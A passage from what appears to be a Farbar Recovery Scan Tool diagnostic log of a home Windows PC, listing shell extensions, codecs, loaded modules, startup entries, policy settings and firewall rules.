CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\17.0.2006.0314\amd64\SkyDriveShell64.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\17.0.2006.0314\amd64\FileSyncApi64.dll (Microsoft Corporation -> Microsoft Corporation)
ShellExecuteHooks-x32: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2210608 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers1: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers1: [DivXShellExtensionItem] -> {48A8A3B0-57E8-4F2B-A49D-19E02B92377B} => C:\Program Files (x86)\Common Files\DivX Shared\DivXShellExtension64.dll [2018-10-09] (DivX, LLC -> DivX, LLC)
ContextMenuHandlers1: [DivXShellExtensionItem64] -> {6B49A276-0DBA-43F4-BC96-A841AD11B40B} => C:\Program Files (x86)\Common Files\DivX Shared\DivXShellExtension64.dll [2018-10-09] (DivX, LLC -> DivX, LLC)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext64.dll [2006-12-11] () [File not signed]
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext.dll [2007-05-05] () [File not signed]
ContextMenuHandlers3: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers3: [{4A7C4306-57E0-4C0C-83A9-78C1528F618C}] -> {4A7C4306-57E0-4C0C-83A9-78C1528F618C} => c:\program files (x86)\real\realplayer\RPDS\Bin64\rpcloudview.dll [2015-02-06] (RealNetworks, Inc. -> RealNetworks, Inc.)
ContextMenuHandlers4: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext64.dll [2006-12-11] () [File not signed]
ContextMenuHandlers4-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext.dll [2007-05-05] () [File not signed]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2012-03-19] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShell.dll [2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext64.dll [2006-12-11] () [File not signed]
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRar\rarext.dll [2007-05-05] () [File not signed]
 
==================== Codecs (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Drivers32: [VIDC.ACDV] => ACDV.dll
HKLM\...\Drivers32-x32: [VIDC.ACDV] => ACDV.dll
HKLM\...\Drivers32: [vidc.DIVX] => C:\Windows\SysWOW64\DivX.dll [720384 2010-02-19] (DivX, Inc.) [File not signed]
HKLM\...\Drivers32: [vidc.yv12] => C:\Windows\SysWOW64\DivX.dll [720384 2010-02-19] (DivX, Inc.) [File not signed]
HKLM\...\Drivers32-x32: [VIDC.LAGS] => lagarith.dll
HKLM\...\Drivers32: [vidc.XVID] => C:\Windows\SysWOW64\xvidvfw.dll [179200 2009-01-25] () [File not signed]
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
ShortcutWithArgument: C:\Users\Vladana\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory="Profile 1"
 
==================== Loaded Modules (Whitelisted) =============
 
2013-05-18 17:25 - 2013-05-18 17:25 - 001350656 _____ ( ) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_64\PFNGadgetClass\10d2c6adb5906a1d7bbeb75d2a713c07\PFNGadgetClass.ni.dll
2017-09-02 13:47 - 2016-07-21 09:54 - 000137728 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSCreateVC.dll
2017-09-02 13:47 - 2016-10-08 16:03 - 001506304 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\DAQExp.dll
2018-06-05 02:08 - 2014-05-19 16:19 - 000137728 _____ () [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\CBSCreateVC.dll
2018-06-05 02:08 - 2014-10-31 15:40 - 001498112 _____ () [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\DAQExp.dll
2017-09-02 13:47 - 2017-08-15 09:10 - 000113664 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\Tasks.dll
2017-09-02 13:47 - 2017-08-15 09:10 - 000139776 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\Utility.dll
2017-09-02 13:46 - 2017-03-10 10:35 - 000758784 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\WUL.Core.dll
2017-09-02 13:46 - 2017-03-10 10:35 - 001778688 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\WUL.Ctrls.dll
2017-09-02 13:46 - 2017-03-10 10:35 - 000046080 _____ () [File not signed] C:\Program Files (x86)\KeepVid\KeepVid Pro\WUL.Localization.dll
2011-12-16 15:37 - 2011-12-16 15:37 - 002437632 _____ (FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNCommon.dll
2011-12-16 15:38 - 2011-12-16 15:38 - 002246144 _____ (FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNDevice.dll
2011-12-22 09:03 - 2011-12-22 09:03 - 002281984 _____ (FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNWLAN.dll
2013-05-18 17:25 - 2013-05-18 17:25 - 000421888 _____ (FUJITSU LIMITED) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_64\PFNLocSet\b7cc59ff84258f2c78492c7ef6c33d6e\PFNLocSet.ni.dll
2013-05-18 17:25 - 2013-05-18 17:25 - 000473088 _____ (FUJITSU LIMITED) [File not signed] C:\Windows\assembly\NativeImages_v2.0.50727_64\PFNSwData\9a909070ecd70366e5c577eb52b4bbda\PFNSwData.ni.dll
2012-03-08 12:17 - 2012-03-08 12:17 - 000333312 _____ (Intel Corporation) [File not signed] C:\Program Files\Intel\BluetoothHS\BTHSSupplicant.dll
2012-03-01 10:52 - 2012-03-01 10:52 - 000105472 _____ (Intel Corporation) [File not signed] C:\Program Files\Intel\BluetoothHS\UsR3IoPort.dll
2012-03-29 06:37 - 2012-03-29 06:37 - 000498176 _____ (Intel Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\P2PSupplicant.dll
2012-04-17 18:35 - 2012-04-17 18:35 - 000168448 _____ (Intel® Corporation) [File not signed] C:\Program Files\Common Files\Intel\WirelessCommon\PsRegApi.dll
2012-04-17 18:37 - 2012-04-17 18:37 - 000284160 _____ (Intel® Corporation) [File not signed] C:\Program Files\Common Files\Intel\WirelessCommon\TraceApi.dll
2012-04-17 18:36 - 2012-04-17 18:36 - 003280896 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\AmtWsMan.dll
2012-04-17 18:34 - 2012-04-17 18:34 - 000102400 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\DbEngine.dll
2012-04-17 18:38 - 2012-04-17 18:38 - 000104448 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\IntStngs.dll
2012-04-17 18:37 - 2012-04-17 18:37 - 000054272 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\IWMSPROV.DLL
2012-04-17 18:46 - 2012-04-17 18:46 - 000545792 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\MurocApi.dll
2012-04-17 18:50 - 2012-04-17 18:50 - 000324608 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\panihvint.dll
2012-04-17 18:43 - 2012-04-17 18:43 - 001051136 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\PfMgrApi.dll
2012-04-17 18:51 - 2012-04-17 18:51 - 000178176 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\Ps7ZCfgS.dll
2012-04-17 18:34 - 2012-04-17 18:34 - 000020992 _____ (Intel® Corporation) [File not signed] C:\Program Files\Intel\WiFi\bin\S24MUDLL.dll
2012-04-17 18:45 - 2012-04-17 18:45 - 002463744 _____ (Intel® Corporation) [File not signed] C:\Windows\System32\IWMSSvc.dll
2006-10-26 13:44 - 2006-10-26 13:44 - 000123904 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\csm.dll
2006-10-26 13:45 - 2006-10-26 13:45 - 000247296 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\msdbg2.dll
2012-04-17 17:52 - 2012-04-17 17:52 - 001830912 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [File not signed] C:\Program Files\Common Files\Intel\WirelessCommon\Libeay32.dll
2017-09-02 13:47 - 2016-10-08 16:04 - 000708608 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSProducstInfo.dll
2018-06-05 02:08 - 2014-10-31 15:41 - 000708608 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\CBSProducstInfo.dll
 
==================== Alternate Data Streams (Whitelisted) ========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\ProgramData\TEMP:94A19129 [260]
 
==================== Safe Mode (Whitelisted) ==================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
 
==================== Association (Whitelisted) =================
 
==================== Internet Explorer trusted/restricted ==========
 
==================== Hosts content: =========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2019-11-09 17:42 - 2019-11-18 19:26 - 000000822 _____ C:\Windows\system32\drivers\etc\hosts
 
==================== Other Areas ===========================
 
(Currently there is no automatic fix for this section.)
 
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;C:\Program Files (x86)\PC Connectivity Solution\;C:\Program Files\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live;C:\Program Files (x86)\Intel\iCLS Client\;C:\Program Files\Intel\iCLS Client\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Intel\OpenCL SDK\2.0\bin\x86;C:\Program Files (x86)\Intel\OpenCL SDK\2.0\bin\x64;C:\Program Files\Intel\Intel® Management Engine Components\DAL;C:\Program Files\Intel\Intel® Management Engine Components\IPT;C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL;C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT;C:\Program Files\Intel\WiFi\bin\;C:\Program Files\Common Files\Intel\WirelessCommon\;C:\Program Files (x86)\Windows Live\Shared;C:\Program Files (x86)\QuickTime\QTSystem\
HKU\S-1-5-21-7682389-3612777877-391866582-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 0) (EnableLUA: 0)
mpsdrv => Firewall Service is not running.
MpsSvc => Firewall Service is not running.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(If an entry is included in the fixlist, it will be removed.)
 
MSCONFIG\Services: BstHdAndroidSvc => 2
MSCONFIG\Services: BstHdLogRotatorSvc => 2
MSCONFIG\Services: RealNetworks Downloader Resolver Service => 2
MSCONFIG\Services: RealPlayer Cloud Service => 2
MSCONFIG\Services: RealPlayerUpdateSvc => 2
MSCONFIG\Services: wuauserv => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^RealPlayer Cloud Service UI.lnk => C:\Windows\pss\RealPlayer Cloud Service UI.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^Vladana^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^ZenMate.bat => C:\Windows\pss\ZenMate.bat.Startup
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: BlueStacks Agent => C:\Program Files (x86)\BlueStacks\HD-Agent.exe
MSCONFIG\startupreg: DivXMediaServer => C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe
MSCONFIG\startupreg: DivXUpdate => "C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
MSCONFIG\startupreg: Google Update => "C:\Users\Vladana\AppData\Local\Google\Update\GoogleUpdate.exe" /c
MSCONFIG\startupreg: NSU_agent => "C:\Program Files (x86)\Nokia\Nokia Software Updater\nsu3ui_agent.exe"
MSCONFIG\startupreg: PC Suite Tray => "C:\Program Files (x86)\Nokia\Nokia PC Suite 7\PCSuite.exe" -onlytray
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: RealDownloader => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe
MSCONFIG\startupreg: Spotify Web Helper => C:\Users\Vladana\AppData\Roaming\Spotify\SpotifyWebHelper.exe --autostart
MSCONFIG\startupreg: TkBellExe => "c:\program files (x86)\real\realplayer\Update\realsched.exe" -osboot
MSCONFIG\startupreg: Wondershare Helper Compact.exe => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
 
==================== FirewallRules (Whitelisted) ================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [{418A7595-F489-448D-A132-2A9519236EF0}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe (Intel Corporation-Mobile Wireless Group -> )
FirewallRules: [{B0E6337C-DD13-46CD-A572-58359114E70E}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{5B4B9E35-FBA6-4F36-8798-35D35E29E74B}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{B1CC60A0-4651-4E6D-A4FA-32240C388099}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{A0A9A6FA-AE67-4AB9-B612-32D06F124746}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{CE426DDA-632D-4252-8AF5-B3999BF81124}] => (Allow) C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{CDC85982-754B-4DE3-977B-6E479A26C388}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{F565ACF8-37C4-4665-A110-386DCCDF81E9}] => (Allow) LPort=2869
FirewallRules: [{BA538C52-47F4-4638-88FB-D4E100881E6A}] => (Allow) LPort=1900
FirewallRules: [TCP Query User{838DFD5B-BE28-4A8A-9D48-591EFEF35AB6}C:\program files (x86)\real\realplayer\realplay.exe] => (Allow) C:\program files (x86)\real\realplayer\realplay.exe (RealNetworks, Inc. -> RealNetworks, Inc.)
FirewallRules: [UDP Query User{7BCDD032-7F97-4FE8-ADB0-130474CDDD9F}C:\program files (x86)\real\realplayer\realplay.exe] => (Allow) C:\program files (x86)\real\realplayer\realplay.exe (RealNetworks, Inc. -> RealNetworks, Inc.)
FirewallRules: [{DAA4242B-32CB-43E0-B514-40A492583C52}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{87CC937C-627E-4461-A86D-A01FA1D52711}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{787EA532-6389-4D57-8CB4-56ED49F60E38}] => (Allow) C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe No File
FirewallRules: [{F0F6824E-F9E8-401C-92A1-52EE1D31841E}] => (Allow) C:\Users\Vladana\AppData\Local\ROX Player\roxplayer.exe No File
FirewallRules: [TCP Query User{BE9D298D-4B00-4F7D-AA02-CE4B8C269C09}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe No File
FirewallRules: [UDP Query User{010D4FEB-5458-4625-B346-3F087D27F4A3}C:\program files (x86)\java\jre7\bin\java.exe] => (Allow) C:\program files (x86)\java\jre7\bin\java.exe No File
FirewallRules: [TCP Query User{DF4734DC-C765-4167-986C-24CF01DB1137}C:\program files (x86)\vuze\azureus.exe] => (Block) C:\program files (x86)\vuze\azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
FirewallRules: [UDP Query User{E878D949-B0E7-411A-8F5A-335EE806B7C2}C:\program files (x86)\vuze\azureus.exe] => (Block) C:\program files (x86)\vuze\azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
FirewallRules: [TCP Query User{C1202602-2671-439A-8CF4-FFA06CC539FB}C:\users\vladana\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\vladana\appdata\local\google\chrome\application\chrome.exe No File
FirewallRules: [UDP Query User{3F9714B5-446C-4FD2-91A7-085A9AAF37D8}C:\users\vladana\appdata\local\google\chrome\application\chrome.exe] => (Block) C:\users\vladana\appdata\local\google\chrome\application\chrome.exe No File
FirewallRules: [TCP Query User{813FD61F-108E-4C8F-8713-5C5C65A07F20}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{94D1C3B8-E5D6-406D-8550-D0FB1A8AFD18}C:\program files (x86)\java\jre7\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre7\bin\jp2launcher.exe No File
FirewallRules: [TCP Query User{EBCB1A48-8CAD-40A0-97C9-A5E7D1969006}C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe No File
FirewallRules: [UDP Query User{51B1713E-C3DC-4E9B-8B2E-299D5D7EB37D}C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\node-webkit\popcorn time.exe No File
FirewallRules: [{AD675AD4-8A27-4858-B7BF-64062E576C45}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{FF4764D4-F4A6-4C99-B73E-53F8DE61E6F9}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{61F7EE47-9BA9-4D47-ADB6-5E48B1DF1F11}] => (Allow) c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe (RealNetworks, Inc. -> RealNetworks, Inc.)
FirewallRules: [TCP Query User{9DA426E5-870A-46BA-ACD6-3BECCA6D3981}C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{E35C77F8-2476-4F58-B62F-633DD6DA4D7B}C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_31\bin\jp2launcher.exe No File
FirewallRules: [TCP Query User{64ADE5CF-E0E0-432A-ADCA-107CEF11A830}C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{29E89790-5F1F-403F-9200-85040488F6BF}C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_40\bin\jp2launcher.exe No File
FirewallRules: [TCP Query User{051C8ED1-8257-4C07-9843-3A321CB1D2B5}C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe No File
FirewallRules: [UDP Query User{11E9C41A-BB10-4AE0-86A2-D113F4631726}C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\Java\jre1.8.0_45\bin\jp2launcher.exe No File
FirewallRules: [TCP Query User{1028E6BB-11FD-426E-9846-980F150B8359}C:\users\vladana\appdata\local\popcorn time\nw.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\nw.exe No File
FirewallRules: [UDP Query User{131B9741-3987-48AB-97A9-8EB722A5AD2D}C:\users\vladana\appdata\local\popcorn time\nw.exe] => (Allow) C:\users\vladana\appdata\local\popcorn time\nw.exe No File
FirewallRules: [{10CC44FD-3D7B-40D9-B4E9-C8B90B3CDA05}] => (Allow) C:\Program Files (x86)\nokia\nokia suite\nokiasuite.exe (Nokia -> Nokia)
FirewallRules: [{0F44D93E-8116-4C28-A09E-375525612959}] => (Allow) C:\Program Files (x86)\Common Files\nokia\service layer\a\nsl_host_process.exe No File
FirewallRules: [{DE2D1B1A-A95A-4427-8BD7-97016C528F99}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe (Popcorn Time) [File not signed]
FirewallRules: [{023EC48C-AAA6-4832-8DEF-E77068991D61}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe (Popcorn Time) [File not signed]
FirewallRules: [{ED5D1E50-0E04-48A8-A0FF-52EBBC8DC18D}] => (Allow) C:\Users\Vladana\AppData\Local\Temp\Andy_46.2_x64\Setup.exe No File
FirewallRules: [{A9B6A8FC-243F-45C5-B45E-B94CA201DFA7}] => (Allow) C:\Program Files\Andy\andy.exe No File
FirewallRules: [{59B2491E-5BF2-4DC5-AE8D-F34BD2AC1230}] => (Allow) C:\Program Files\Andy\andy.exe No File
FirewallRules: [{EF33A6D0-D34B-4630-9AE0-D5B6319C642D}] => (Allow) C:\Program Files\Andy\AndyConsole.exe No File
FirewallRules: [{0C8E4F25-226B-4BC9-BBD0-A6FDD1D99E01}] => (Allow) C:\Program Files\Andy\AndyConsole.exe No File
FirewallRules: [{E5EC7B01-738D-42B0-960C-4051ADBF6E85}] => (Allow) C:\Program Files\Andy\SetupFiles\Uninstall.exe No File
FirewallRules: [{28B9FA2D-E66B-453A-9DAB-DDB820A60893}] => (Allow) C:\Program Files\Andy\SetupFiles\Uninstall.exe No File
FirewallRules: [{2F79B4C8-3AFC-4E30-B1B2-EE4203877302}] => (Allow) C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe No File
FirewallRules: [{FEE98E1E-A352-4C6D-A55F-F641B4E69F55}] => (Allow) C:\Users\Vladana\AppData\Local\Temp\Uninstall.exe No File
FirewallRules: [{A16DB9E7-288D-4E5B-BD58-5404E7DED756}] => (Allow) C:\Program Files\Andy\HandyAndy.exe No File
FirewallRules: [{986F830C-A0F0-4829-A1D3-6E209C9346FE}] => (Allow) C:\Program Files\Andy\HandyAndy.exe No File
FirewallRules: [{7AB977CD-EA90-4ECA-865F-E3924B0DEBC6}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{9FDF76F3-5DF0-4A94-B6C4-F6F10388EEDD}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{9E97B312-F759-4491-9B4A-9A7F7BD66B49}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{3B74B220-3059-4A75-949E-50972E487A28}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{187F27A2-9AE2-489B-B927-B8FC03CC268B}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{A9130200-545F-467A-9A36-1B798C073847}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{7F1F91ED-8AE2-4EF5-8A6E-42BCE82D179B}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [{5DEA6D27-54CF-4606-949E-BD3C17E5B786}] => (Allow) C:\ProgramData\BlueStacksGameManager\OBS\HD-OBS.exe No File
FirewallRules: [TCP Query User{DF58AEE1-F55F-4C53-ADDB-ACE482856AE1}C:\users\vladana\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\vladana\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [UDP Query User{872BEA53-323F-4801-81BF-7FFB853B9696}C:\users\vladana\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\vladana\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd)
FirewallRules: [{8EB9B601-87D3-4318-8ED9-03D843F1590B}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\Video Download Capture 6.exe (Apowersoft Ltd -> Apowersoft)
FirewallRules: [{597233C9-A6EB-4645-8677-888825AFC9CE}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\Video Download Capture 6.exe (Apowersoft Ltd -> Apowersoft)
FirewallRules: [{4077A009-74D8-44BE-AD00-C76EEF7EE5BD}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\rtmpsrv.exe (Apowersoft Ltd -> )
FirewallRules: [{DAE1B584-4569-4BAB-B953-D64ABABDAAD5}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Download Capture 6\rtmpsrv.exe (Apowersoft Ltd -> )
FirewallRules: [TCP Query User{3B57E49F-50A7-468F-A210-D44AA14F7EE4}C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe] => (Allow) C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe (WONBO TECHNOLOGY Co.,LIMITED -> Wondershare)
FirewallRules: [UDP Query User{13BD579F-4B71-49B9-9983-2D442B1932E8}C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe] => (Allow) C:\program files (x86)\keepvid\keepvid pro\downloadres\urlreqservice.exe (WONBO TECHNOLOGY Co.,LIMITED -> Wondershare)
FirewallRules: [{CF745F74-D653-4FD3-8D0D-19E40F7120AE}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Converter Studio\Video Converter Studio.exe No File
FirewallRules: [{AB407DB0-7E44-4FFA-A876-AC39F106ECB0}] => (Allow) C:\Program Files (x86)\Apowersoft\Video Converter Studio\Video Converter Studio.exe No File
FirewallRules: [{6D250D03-52C1-4019-980F-9AC5B16C218B}] => (Allow) C:\Program Files (x86)\Vuze\Azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
FirewallRules: [{79C5FF69-9C6C-4795-BBBF-8058548DF184}] => (Allow) C:\Program Files (x86)\Vuze\Azureus.exe (Azureus Software, Inc. -> Azureus Software, Inc)
FirewallRules: [TCP Query User{C22CAF2C-8CE3-4B0E-B3E7-5A8C676B5F8E}C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_73\bin\javaw.exe No File
